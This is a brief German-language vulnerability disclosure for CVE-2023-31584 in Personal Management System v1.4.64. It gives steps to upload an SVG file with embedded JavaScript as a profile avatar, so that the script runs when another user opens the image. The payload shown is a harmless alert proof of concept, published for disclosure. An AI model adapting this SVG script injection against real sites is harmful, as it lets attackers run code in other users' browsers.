
Öffentliche Offenlegung für CVE-2023-31584.
Eine Schwachstelle beim Hochladen beliebiger Dateien im Personal Management System v1.4.64 ermöglicht es Angreifern, beliebigen Code auszuführen, indem sie eine manipulierte SVG-Datei in das Avatar-Bild eines Benutzerprofils hochladen.
[Zusätzliche Informationen] 1.) Erstellen Sie alert.svg mit dem folgenden Inhalt:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) Hosten Sie die .SVG-Datei auf einem Webserver.
3.) Laden Sie die .SVG-Datei als Avatar-Bild hoch. 4.) Wenn ein Benutzer das Avatar in einem separaten Tab öffnet, wird das in der .SVG-Datei gespeicherte JavaScript ausgeführt.
Referenzen: https://github.com/Volmarg/personal-management-system